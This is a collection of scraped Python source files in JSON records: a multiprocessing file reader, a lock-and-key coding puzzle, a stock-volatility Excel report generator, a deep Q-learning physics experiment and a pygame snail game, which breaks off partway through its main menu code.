+{"seq_id":"33892750126","text":"import multiprocessing as mp\nimport os\ntry:\n from queue import Queue, Empty\nexcept ImportError:\n from Queue import Queue, Empty # python 2.x\n\nBLOCKSIZE = 0x100000\n\ndef f(qfd):\n q, fd = qfd[0], qfd[1]\n for block in nonblocking_read(fd):\n q.put(block, False)\n\ndef nonblocking_read(fd):\n while True:\n try:\n block = os.read(fd, BLOCKSIZE)\n except BlockingIOError:\n yield bytearray() #yield empty buffer if no data\n continue\n \n if not block:\n yield bytearray()\n break\n\n yield block\n\ndef consumer(queue):\n while True:\n try:\n block = queue.get_nowait() # or q.get(timeout=.1)\n except Empty:\n yield bytearray()\n break\n else:\n yield block\n\ndef main():\n import glob\n epics_files = glob.glob(\"/reg/d/psdm/xpp/xpptut15/scratch/mona/xtc2/smalldata/data-r0001-s*.xtc2\")\n epics_fds = [os.open(epics_file, os.O_RDONLY | os.O_NONBLOCK) for epics_file in epics_files]\n p = mp.Pool(processes=len(epics_fds))\n q = mp.Manager().Queue()\n p.map(f, [(q, epics_fd) for epics_fd in epics_fds])\n\n for block in consumer(q):\n print('received %d bytes'%(memoryview(block).shape[0]))\n \n \"\"\" \n its = []\n while True:\n try:\n print(\"Waiting for item from queue for up to 5 seconds\")\n i = q.get(True, 5)\n print(\"found %d bytes from the queue.\"%(memoryview(i).shape[0]))\n its.append(i)\n except Empty:\n print(\"Caught queue empty exception, done\")\n break\n print(\"processed %d items, completion successful\"%len(its))\n \"\"\"\n\n p.close()\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/more_thread_and_queue.py","file_name":"more_thread_and_queue.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73800063468","text":"def solution(key, lock):\n answer = False\n def rclock90(key):\n key90=[]\n for i in key:\n key90.append(i[:])\n lenkey = len(key90)\n for i in range(lenkey):\n for j in range(lenkey):\n key[i][j] = key90[j][lenkey-1-i]\n \n for i in key:\n print(i)\n\n for i in lock:\n print(i)\n\n \n lenkey = len(key)\n for _ in range(4):\n tmplock = lock[:]\n for i in range(lenkey):\n for j in range(lenkey):\n for a in range(i):\n for b in range(j):\n tmplock[a][b] += key[a][b]\n if tmplock == [[1,1,1],[1,1,1],[1,1,1]]:\n answer = True\n return True\n rclock90(key)\n \n\n \n\n\n return answer\n\nkey = input()\nlock = input()\n\n\nprint(solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]],[[1, 1, 1], [1, 1, 0], [1, 0, 1]]))\n\n\n\n\"\"\"\nfor i in tmplock:\n print(i)\n print(\"---\")\n[[0, 0, 0], [1, 0, 0], [0, 1, 1]]\n[[1, 1, 1], [1, 1, 0], [1, 0, 1]]\n\"\"\"","repo_name":"csw1511/algorithm_study","sub_path":"Python codingtest bookstudy/10 implement practice/4 lock and key.py","file_name":"4 lock and key.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71497644908","text":"\r\nimport pandas as pd\r\nimport yfinance as yf\r\nimport datetime as dt\r\nimport xlsxwriter\r\nimport math\r\nimport statistics\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nfileName = input(\"Enter a name for the excel file: \")\r\ndef generate_df(ticker, start_date='2021-1-1', volatilityDays=50, calendarYear=365):\r\n df = yf.download(ticker, start_date, end = '2022-06-30')\r\n df = df.drop([\"Open\", \"High\", \"Low\", \"Volume\", \"Close\"], axis=1)\r\n df = df.reset_index()\r\n df[\"Px Change\"] = None\r\n df[\"Volatility\"] = None\r\n closes = df[\"Adj Close\"].tolist()\r\n for i in range(1, len(df)):\r\n df.iat[i, 2] =round((math.log(df.iloc[i, 1] / df.iloc[i-1, 1])),\r\n 4)\r\n if i >= volatilityDays:\r\n df.iat[i, 3] = round((statistics.stdev(closes[i-50:i]) * math.sqrt(calendarYear)), 4) / 100\r\n df['Adj Close'] = df['Adj Close'].apply(lambda x: round(x, 2))\r\n volatilities = df[\"Volatility\"][50:].tolist()\r\n meanVol = statistics.mean(volatilities)\r\n prices = df[\"Adj Close\"].tolist()\r\n meanPrice = statistics.mean(prices)\r\n factor = meanPrice / meanVol\r\n df[\"Adj Vol\"] = df[\"Volatility\"] * factor\r\n for i in range(50):\r\n df.iat[i, 4] = None\r\n return df\r\n\r\n\r\n\r\nstocks = [\"AMAM\", \"HCWB\", \"JANX\", \"HOWL\", \"IKNA\", \"BOLT\", \"SNSE\",\r\n \"CGEM\", \"SBTX\", \"ONCR\", \"NRIX\", \"ALXO\", \"ITOS\", \"AAPL\"]\r\n\r\ndef generate_dfs(stocks, calendarYear, volatilityDays, start_date):\r\n dfs = {}\r\n for stock in stocks:\r\n df = generate_df(stock, start_date, volatilityDays, calendarYear)\r\n dfs[stock] = df\r\n return dfs\r\n\r\nprint(\"Gathering Data\")\r\ndfs = generate_dfs(stocks, 365, 50, dt.date(2015, 1, 1))\r\n\r\n\r\n\r\n\r\nmainWorkbook = xlsxwriter.Workbook(f'{fileName}.xlsx')\r\n\r\ndef writeToWorksheet(df, wb, ticker, calenderYear=365,\r\n volatilityDays=50):\r\n ws = wb.add_worksheet(ticker)\r\n ws.set_column(0, 0, 12)\r\n ws.set_column(1, 1, 10)\r\n ws.set_column(2, 4, 10)\r\n menu_format = wb.add_format({'bg_color' : '#004481',\r\n 'font_color' : 'white',\r\n 'font_name' : 'Arial',\r\n 'font_size' : 10})\r\n menu_responses = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'align' : 'right'})\r\n olive_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#cabc96'})\r\n olive_background_pct = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#cabc96',\r\n 'num_format' : '0.00%'})\r\n grey_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#eff1ef'})\r\n grey_background_num = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#eff1ef',\r\n 'num_format' : '0.00%'})\r\n blue_background = wb.add_format({'font_name' : 'Arial',\r\n 'font_size' : 10,\r\n 'bg_color' : '#baeafc'})\r\n menuWords = [\"Source\", \"Ticker\", \"Calendar Year\", \"Volatility Days\",\r\n \"Start Date\", \"Close\", \"Current\", \"Average\", \"Maximum\",\r\n \"Minimum\"]\r\n for i in range(len(menuWords)):\r\n ws.write(i, 0, menuWords[i], menu_format)\r\n ws.write(0, 1, \"Yahoo\", menu_responses)\r\n ws.write(1, 1, ticker, menu_responses)\r\n ws.write(2, 1, calenderYear, menu_responses)\r\n ws.write(3, 1, volatilityDays, menu_responses)\r\n ws.write(4, 1, df.iloc[0][0].strftime(\"%m/%d/%Y\"), menu_responses)\r\n ws.write(10, 0, \"Date\", grey_background)\r\n ws.write(10, 1, \"Adj Close\", grey_background)\r\n ws.write(10, 2, \"Px Change\", 
grey_background)\r\n ws.write(10, 3, \"Volatility\", grey_background)\r\n ws.write(5, 1, df.iloc[len(df)-1][1], olive_background)\r\n ws.write(10, 4, \"Adj Vol\", grey_background)\r\n volatilities = (df[\"Volatility\"].tolist())[volatilityDays:]\r\n if len(df) > volatilityDays:\r\n ws.write(6, 1, df.iloc[len(df)-1][3], olive_background_pct)\r\n ws.write(7, 1, statistics.mean(volatilities),\r\n olive_background_pct)\r\n ws.write(8, 1, max(volatilities), olive_background_pct)\r\n ws.write(9, 1, min(volatilities), olive_background_pct)\r\n for i in range(len(df)):\r\n try:\r\n ws.write(i+11, 0, df.iloc[i][0].strftime(\"%m/%d/%Y\"),\r\n blue_background)\r\n ws.write(i+11, 1, df.iloc[i][1], blue_background)\r\n ws.write(i+11, 2, df.iloc[i][2], grey_background_num)\r\n ws.write(i+11, 3, df.iloc[i][3], grey_background_num)\r\n ws.write(i+11, 4, df.iloc[i][4], grey_background_num)\r\n except:\r\n pass\r\n chart = wb.add_chart({'type' : 'line'})\r\n numCells = len(df)\r\n chart.add_series({'values' : f'={ticker}!$B$12:$B${str(numCells + 11)}', 'name' : f'={ticker}!$B$11'})\r\n chart.add_series({'values' : f'={ticker}!$E${volatilityDays}:$E${str(numCells + 11)}', 'name' : f'={ticker}!$D$11'})\r\n ws.insert_chart('F11', chart)\r\n\r\n\r\n\r\n\r\nprint(\"Compiling Excel Sheets\")\r\nfor stock in stocks:\r\n writeToWorksheet(dfs[stock], mainWorkbook, stock)\r\n\r\nmainWorkbook.close()\r\n\r\nprint(f\"File saved as {fileName}.xlsx\")\r\n","repo_name":"jleuschen17/excelAutomater","sub_path":"excelAutomater.py","file_name":"excelAutomater.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
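One caveat on `generate_df` above: it annualizes the standard deviation of raw closing prices and then divides by 100. The more conventional estimate annualizes the standard deviation of daily log returns; a sketch of that alternative (not the author's method):

import numpy as np
import pandas as pd

def annualized_vol(closes: pd.Series, window: int = 50, year: int = 365) -> pd.Series:
    log_ret = np.log(closes / closes.shift(1))  # daily log returns
    return log_ret.rolling(window).std() * np.sqrt(year)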
+{"seq_id":"74534250667","text":"\"\"\"\nBased in part on http://outlace.com/rlpart3.html\n\nI used this as a way to understand Q-learning, \nand then wrote my version based on this.\n\"\"\"\n\nimport sys\n\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import RMSprop\nimport matplotlib.pyplot as plt\nfrom scipy.misc import comb\n\nimport lieb_liniger_state as lls\nimport rho_form_factor as rff\nfrom sum_rule import compute_average_sumrule, left_side, right_side\nfrom utils import map_to_entire_space, map_to_bethe_numbers, get_allowed_indices, select_action\n\n\ndef neural_net(N_world):\n model = Sequential()\n model.add(Dense(units=int(N_world**1.5), kernel_initializer='lecun_uniform', activation='tanh', input_dim=N_world))\n model.add(Dense(units=int(N_world**1.5), kernel_initializer='lecun_uniform', activation='tanh'))\n model.add(Dense(units=N_world**2, kernel_initializer='lecun_uniform', activation='tanh'))\n model.compile(loss='mse', optimizer=RMSprop())\n model.summary()\n return model\n\n\ndef get_sumrule_reward(lstate, rstate):\n return (lstate.energy - rstate.energy) * np.abs(rff.rho_form_factor(lstate, rstate))**2\n\n\ndef get_reward_for_close_states(ff, lstate, rstate, N_world):\n if np.abs(ff) > 0.00001:\n return np.abs(ff)**0.1\n elif distance_to_rstate(lstate, rstate) < N_world**0.5:\n return 1 / distance_to_rstate(lstate, rstate)**0.1\n else:\n return -1\n\n\ndef get_form_factor_reward(lstate, rstate):\n return np.tanh(np.log1p(np.abs(rff.rho_form_factor(lstate, rstate))**2))\n\ndef get_reward_at_final_step(dsf_data, n, no_of_steps, c, L, N, I_max, N_world, rstate):\n # Quite logical that this does not perform well since it puts all reward into single place, which means learning (if any) is very slow.\n if n == no_of_steps:\n return compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world)\n else:\n return 0\n\n\ndef get_partial_sumrule_reward_at_every_step(dsf_data, c, L, N, lstate, rstate):\n if lstate.integer_momentum != 0:\n return left_side(dsf_data[lstate.integer_momentum], rstate.energy) / right_side(lstate.integer_momentum, L, N)\n else:\n return 0\n\n\ndef get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate):\n return compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world)\n\n\ndef get_relative_contribution_reward(dsf_data, L, N, I_max, N_world, N_states, rstate):\n return get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate) / N_states\n\n\ndef get_reward_delta_sumrule(dsf_data, L, N, I_max, N_world, prev_sumrule, rstate):\n return get_full_sumrule_reward_at_every_step(dsf_data, L, N, I_max, N_world, rstate) - prev_sumrule\n\n\ndef get_relative_reward_per_slice(dsf_data, c, L, N, k, rstate):\n if k != 0:\n return left_side(dsf_data[k], rstate.energy) / right_side(k, L, N) / len(dsf_data[k])\n else:\n return 0\n\n\ndef distance_to_rstate(lstate, rstate):\n \"\"\"Calculate the 'distance' between lstate and rstate.\"\"\"\n return np.sum(np.abs(lstate.Is - rstate.Is))\n\n\n\ndef epsilon_greedy(qval, state, previously_visited, epsilon, max_I, N_world, N, check_no_of_pairs=True):\n if np.random.random() < epsilon:\n allowed_actions = get_allowed_indices(state, N_world)\n np.random.shuffle(allowed_actions)\n return select_action(allowed_actions, state, previously_visited, max_I, N_world, N, check_no_of_pairs)\n else:\n return select_action(list(zip(*np.unravel_index(qval[0].argsort(), (N_world, N_world)))), state, 
previously_visited, max_I, N_world, N, check_no_of_pairs)\n\n\ndef q_learning(N_world, I_max, c, L, N, gamma=0.975, alpha=1, epochs=100, epsilon=1, no_of_steps=100, model=None, best_dsf=None, check_no_of_pairs=False):\n # Allow for further training of a given model.\n if not model:\n model = neural_net(N_world)\n rstate = lls.lieb_liniger_state(c, L, N)\n rstate.calculate_all()\n highest_achieved_sumrule = 0\n sums = []\n best_sums = []\n print(f\"Size of search space is Choose[N_world, N]={comb(N_world, N):.3e}\")\n for i in range(1, epochs + 1):\n dsf_data = {}\n previously_visited_states = []\n state = np.array(map_to_entire_space(rstate.Is, I_max), dtype=np.int)\n previously_visited_states.append(list(state))\n previous_sumrule = 0\n for n in range(1, no_of_steps + 1):\n Q = model.predict(state.reshape(1, -1), batch_size=1)\n new_state, action = epsilon_greedy(Q, state, previously_visited_states, epsilon, I_max, N_world, N, check_no_of_pairs=check_no_of_pairs)\n previously_visited_states.append(list(new_state))\n\n new_lstate = lls.lieb_liniger_state(c, L, N, map_to_bethe_numbers(new_state, I_max))\n new_lstate.calculate_all()\n new_lstate.ff = rff.rho_form_factor(new_lstate, rstate)\n\n if new_lstate.integer_momentum in dsf_data.keys():\n dsf_data[new_lstate.integer_momentum].append(new_lstate)\n else:\n dsf_data[new_lstate.integer_momentum] = [new_lstate]\n\n # reward = get_sumrule_reward(new_lstate, rstate)\n reward = get_reward_for_close_states(new_lstate.ff, new_lstate, rstate, N_world)\n # reward = get_form_factor_reward(new_lstate, rstate)\n\n # reward = get_reward_at_final_step(dsf_data, i, no_of_steps, c, L, N, I_max, N_world, rstate)\n # reward = get_partial_sumrule_reward_at_every_step(dsf_data, c, L, N, new_lstate, rstate)\n\n # reward = get_full_sumrule_reward_at_every_step(dsf_data, c, L, N, I_max, N_world, rstate)\n # reward = get_relative_contribution_reward(dsf_data, L, N, I_max, N_world, n, rstate)\n # reward = get_reward_delta_sumrule(dsf_data, L, N, I_max, N_world, previous_sumrule, rstate)\n # reward = get_relative_reward_per_slice(dsf_data, c, L, N, I_max, N_world, new_lstate.integer_momentum, rstate)\n\n\n new_Q = model.predict(new_state.reshape(1, -1), batch_size=1)\n _, new_action = select_action(list(zip(*np.unravel_index(new_Q[0].argsort(), (N_world, N_world)))), state, previously_visited_states, I_max, N_world, N, check_no_of_pairs=False)\n new_best_action = np.ravel_multi_index(new_action, (N_world, N_world))\n new_max_Q = new_Q[0][new_best_action]\n\n y = np.zeros((1, N_world * N_world))\n y[:] = Q[:]\n\n if n == no_of_steps:\n update = reward\n else:\n update = (reward + gamma * new_max_Q)\n\n y[0][new_best_action] = (1 - alpha) * y[0][new_best_action] + alpha * update\n # A batch size 1 makes a huge positive difference in learning performance (probably because there is less overfitting to the single data point).\n model.fit(state.reshape(1, -1), y, batch_size=1, verbose=0)\n\n state = new_state\n\n prev_sumrule = compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False)\n\n sys.stdout.write(f\"epoch: {i:{len(str(epochs))}}, n={n:{len(str(no_of_steps))}}, current sumrule: {compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False):.10f}, best sumrule: {highest_achieved_sumrule:.10f}\\r\")\n sys.stdout.flush()\n\n if epsilon > 0.1:\n epsilon -= 1 / epochs\n\n ave_sum_rule = compute_average_sumrule(dsf_data, rstate.energy, L, N, I_max, N_world, print_all=False)\n sums.append(ave_sum_rule)\n 
print(f\"epoch: {i:{len(str(epochs))}}, n={n:{len(str(no_of_steps))}}, current sumrule: {ave_sum_rule:.10f}, best sumrule: {highest_achieved_sumrule:.10f}\")\n if ave_sum_rule > highest_achieved_sumrule:\n highest_achieved_sumrule = ave_sum_rule\n best_dsf = dsf_data\n best_sums.append(highest_achieved_sumrule)\n\n return model, best_dsf, sums, best_sums\n\n","repo_name":"teunzwart/deepscanning","sub_path":"deep_q_learning.py","file_name":"deep_q_learning.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37574004213","text":"import pygame\nimport sys\nfrom ball1 import Ball\nfrom ball_vertically import ball_v\nfrom random import randint\nfrom button import Button # Отрисовка кнопок в меню\nfrom pygame.locals import * # это добавляет обработку клавиш\n\n#########################################################\n\nsprite_appear_time = 2000 # Интервал появления спрайтов милисекунд\nW, H = 1000, 570 # Соотношения рабочего окна, пикселей\nFPS = 60\ngame_score = 0 # Начальный опыт\ngame_score_max_level = 100\ngame_score_plus = 7\ngame_score_minus = -2\ngame_score_max_minus = -3\ndamage_1 = -100\ndamage_2 = -100\nis_jump = False\njump_count = 10\nVERSION_of_program = 1 # Весия програмым\nmultiplier_hard_easy = 1\nmultiplier_speed = 1\n\n#########################################################\npygame.display.set_icon(pygame.image.load(\"images/snail.png\")) # Иконка программы\npygame.init()\npygame.time.set_timer(pygame.USEREVENT, sprite_appear_time) # Таймер который каждые 2 секунды создает событие (\n# создание спрайтов)\nf = pygame.font.SysFont('arial', 30) # Шрифт опыта\n\nSCREEN = pygame.display.set_mode((W, H)) # Устанавливаем рабочую область\npygame.display.set_caption(\"EAM1studio: Snail Trip\")\n\n#########################################################\n\n# Music\npygame.mixer.pre_init(44100, -16, 1, 512) # Преинициализация чтобы звук эффекты раньше подгрузились и не отставали\nsound_menu = pygame.mixer.Sound('musics/vyibor-nujnogo-deystviya.ogg')\nsound_collideBalls = pygame.mixer.Sound('musics/zvonkiy-schelchok.ogg')\nsound_usui = pygame.mixer.Sound('musics/usui.ogg')\npygame.mixer.music.load('musics/July_level_two_compresed.mp3')\npygame.mixer.music.play(loops=-1, start=54)\nis_music_play = True # ToDo Сделать ВКЛ\n#########################################################\n\n# Подгружаем фон, героя\nbg = pygame.image.load('images/background.jpg').convert()\nbg_first_first = pygame.image.load('images/background_first_first.jpg').convert() # Сразу подгруизм фон для уровней\nbg_first_two = pygame.image.load('images/background_first_two.jpg').convert()\nbg_third_one = pygame.image.load('images/background_third_one.jpg').convert()\nbg_third_two = pygame.image.load('images/background_third_two.jpg').convert()\nbg_fourth = pygame.image.load('images/background_fourth.jpg').convert()\n\nscore = pygame.image.load('images/score_fon.png').convert_alpha()\nsnail = pygame.image.load('images/snail.png').convert_alpha()\n# Change size of hero\nsnail = pygame.transform.scale(snail, (snail.get_width() // 3, snail.get_height() // 3))\nsnail_to_left = pygame.transform.flip(snail, 1, 0)\nsnail_to_right = snail\n# Start position of hero and general position\nt_rect = snail.get_rect(centerx=W // 4, bottom=H // 1.2)\n\nclock = pygame.time.Clock()\n\n#########################################################\n# Меню и разговорные окна\n\nBG_menu = pygame.image.load(\"assets/Background.png\")\n\n\n# Загружаем шрифт\n# ToDo нужно проверить работает ли на другом компьютере. 
Подгружает ли шрифт\ndef get_font(size): # Returns Press-Start-2P in the desired size\n return pygame.font.Font(\"assets/font.ttf\", size)\n\n\ndef play(time_screen_update=0):\n SCREEN.blit(bg_first_first, (0, 0))\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 340, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"BLACK\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_game = Button(image=None, pos=(W - 550, H - 100),\n text_input=\"GAME\", font=get_font(35), base_color=\"BLACK\", hovering_color=\"Green\")\n PLAY_game.changeColor(PLAY_MOUSE_POS)\n PLAY_game.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_game.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n july_game(is_jump, jump_count)\n time_screen_update += 1 # Ввели переменную которая считает циклы, чтобы с гэпом показать второй скрин\n if time_screen_update == 40:\n SCREEN.blit(bg_first_two, (0, 0))\n\n pygame.display.update()\n\n\ndef play_two(time_screen_update=0):\n SCREEN.blit(bg_third_one, (0, 0))\n global game_score_two_level # Ввел глобальный переменную, чтобы при повторе уровня очки обнулялись\n game_score_two_level = 0\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 150, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_game = Button(image=None, pos=(W - 350, H - 100),\n text_input=\"GAME\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_game.changeColor(PLAY_MOUSE_POS)\n PLAY_game.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_game.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n game_level_two()\n time_screen_update += 1 # Ввели переменную которая считает циклы, чтобы с гэпом показать второй скрин\n if time_screen_update == 40:\n SCREEN.blit(bg_third_two, (0, 0))\n\n pygame.display.update()\n\n\ndef play_tree(time_screen_update=0):\n # global game_score_two_level\n # game_score_two_level = 1000 # костыль,т.к.игра продолжает играть и есть вероятность что опыт будет <0 и new def\n\n SCREEN.blit(bg_fourth, (0, 0))\n while True:\n PLAY_MOUSE_POS = pygame.mouse.get_pos()\n # Кнопка назад\n PLAY_BACK = Button(image=None, pos=(W - 350, H - 100),\n text_input=\"MENU\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_BACK.changeColor(PLAY_MOUSE_POS)\n PLAY_BACK.update(SCREEN)\n # Кнопка игра\n PLAY_about = Button(image=None, pos=(W - 600, H - 100),\n text_input=\"ABOUT\", font=get_font(35), base_color=\"Black\", hovering_color=\"Green\")\n PLAY_about.changeColor(PLAY_MOUSE_POS)\n PLAY_about.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BACK.checkForInput(PLAY_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == 
pygame.MOUSEBUTTONDOWN:\n if PLAY_about.checkForInput(PLAY_MOUSE_POS):\n sound_usui.play()\n about()\n\n pygame.display.update()\n\n\ndef options():\n global game_score_max_level\n global multiplier_hard_easy\n global multiplier_speed\n while True:\n OPTIONS_MOUSE_POS = pygame.mouse.get_pos()\n\n SCREEN.fill(\"white\")\n\n # Заглавная надпись\n OPTIONS_TEXT = get_font(45).render(\"OPTIONS\", True, \"Black\")\n OPTIONS_RECT = OPTIONS_TEXT.get_rect(center=(W // 2, H // 5))\n SCREEN.blit(OPTIONS_TEXT, OPTIONS_RECT)\n\n # Кнопка назад в меню\n OPTIONS_BACK = Button(image=None, pos=(W // 2, H - 100),\n text_input=\"BACK\", font=get_font(45), base_color=\"Black\", hovering_color=\"Green\")\n\n OPTIONS_BACK.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_BACK.update(SCREEN)\n\n # Кнопка Первого уровня\n OPTIONS_july_game = Button(image=None, pos=(W // 2, H // 3),\n text_input=\"FIRST GAME\", font=get_font(30), base_color=\"Gray\",\n hovering_color=\"Green\")\n\n OPTIONS_july_game.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_july_game.update(SCREEN)\n\n # Кнопка Второго уровня\n OPTIONS_game_two = Button(image=None, pos=(W // 2, H // 3 + 50),\n text_input=\"SECOND GAME\", font=get_font(30), base_color=\"Gray\",\n hovering_color=\"Green\")\n\n OPTIONS_game_two.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_game_two.update(SCREEN)\n\n # Кнопка Отключить музыку\n OPTIONS_music_off = Button(image=None, pos=(W // 2, H // 3 + 100),\n text_input=\"MUSIC OFF\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n\n OPTIONS_music_off.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_music_off.update(SCREEN)\n\n # Кнопка Уровень Изи\n OPTIONS_easy = Button(image=None, pos=(W // 2, H // 3 + 150),\n text_input=\"EASY KATKA\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n OPTIONS_easy.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_easy.update(SCREEN)\n # Кнопка Уровень Изи\n OPTIONS_hard = Button(image=None, pos=(W // 2, H // 3 + 200),\n text_input=\"HARD KATKA\", font=get_font(30), base_color=\"Black\",\n hovering_color=\"Green\")\n\n OPTIONS_hard.changeColor(OPTIONS_MOUSE_POS)\n OPTIONS_hard.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_BACK.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_july_game.checkForInput(OPTIONS_MOUSE_POS):\n sound_usui.play()\n july_game(is_jump, jump_count)\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_game_two.checkForInput(OPTIONS_MOUSE_POS):\n sound_usui.play()\n game_level_two()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_music_off.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n pygame.mixer.music.pause()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_easy.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n game_score_max_level = 1\n multiplier_hard_easy = 1\n multiplier_speed = 1\n main_menu()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if OPTIONS_hard.checkForInput(OPTIONS_MOUSE_POS):\n sound_menu.play()\n game_score_max_level = 2000\n multiplier_hard_easy = 10\n multiplier_speed = 2\n main_menu()\n\n pygame.display.update()\n\n\ndef about():\n while True:\n about_MOUSE_POS = pygame.mouse.get_pos()\n\n BG_about = pygame.image.load(\"images/background_about.jpg\").convert()\n SCREEN.blit(BG_about, (0, 0))\n\n about_BACK = Button(image=None, pos=(W // 2, H - 100),\n text_input=\"BACK\", font=get_font(35), base_color=\"Black\", 
hovering_color=\"Green\")\n\n about_BACK.changeColor(about_MOUSE_POS)\n about_BACK.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if about_BACK.checkForInput(about_MOUSE_POS):\n sound_menu.play()\n main_menu()\n\n pygame.display.update()\n\n\ndef eam():\n while True:\n\n BG_about = pygame.image.load(\"images/background_eam.jpg\").convert()\n SCREEN.blit(BG_about, (0, 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n sound_menu.play()\n main_menu()\n\n pygame.display.update()\n\n\ndef game_over():\n while True:\n game_over_MOUSE_POS = pygame.mouse.get_pos()\n\n SCREEN.fill(\"white\")\n\n game_over_TEXT = get_font(45).render(\"GAME OVER\", True, \"Black\")\n game_over_RECT = game_over_TEXT.get_rect(centerx=W // 2, bottom=H // 4)\n SCREEN.blit(game_over_TEXT, game_over_RECT)\n\n game_over_TEXT = get_font(25).render(\"Please don't let the snail die!\", True, \"Black\")\n game_over_RECT = game_over_TEXT.get_rect(centerx=W // 2, bottom=H // 3)\n SCREEN.blit(game_over_TEXT, game_over_RECT)\n\n game_over_BACK = Button(image=None, pos=(W // 2, int(H // 1.3)),\n text_input=\"MENU\", font=get_font(75), base_color=\"Black\", hovering_color=\"Green\")\n\n game_over_BACK.changeColor(game_over_MOUSE_POS)\n game_over_BACK.update(SCREEN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if game_over_BACK.checkForInput(game_over_MOUSE_POS):\n sound_menu.play()\n main_menu()\n global game_score\n game_score = 0\n pygame.display.update()\n\n\ndef main_menu():\n while True:\n SCREEN.blit(BG_menu, (0, 0))\n\n MENU_MOUSE_POS = pygame.mouse.get_pos()\n\n MENU_TEXT = get_font(50).render(\"MAIN MENU\", True, \"#b68f40\")\n MENU_RECT = MENU_TEXT.get_rect(centerx=W // 2, bottom=H // 4)\n\n # Подгружаем рамки для текста\n image_play = pygame.image.load(\"assets/Play Rect.png\")\n image_options = pygame.image.load(\"assets/Options Rect.png\")\n image_quit = pygame.image.load(\"assets/Quit Rect.png\")\n\n # Масштабируем рамки\n image_play = pygame.transform.scale(image_play, (int(image_play.get_width() // 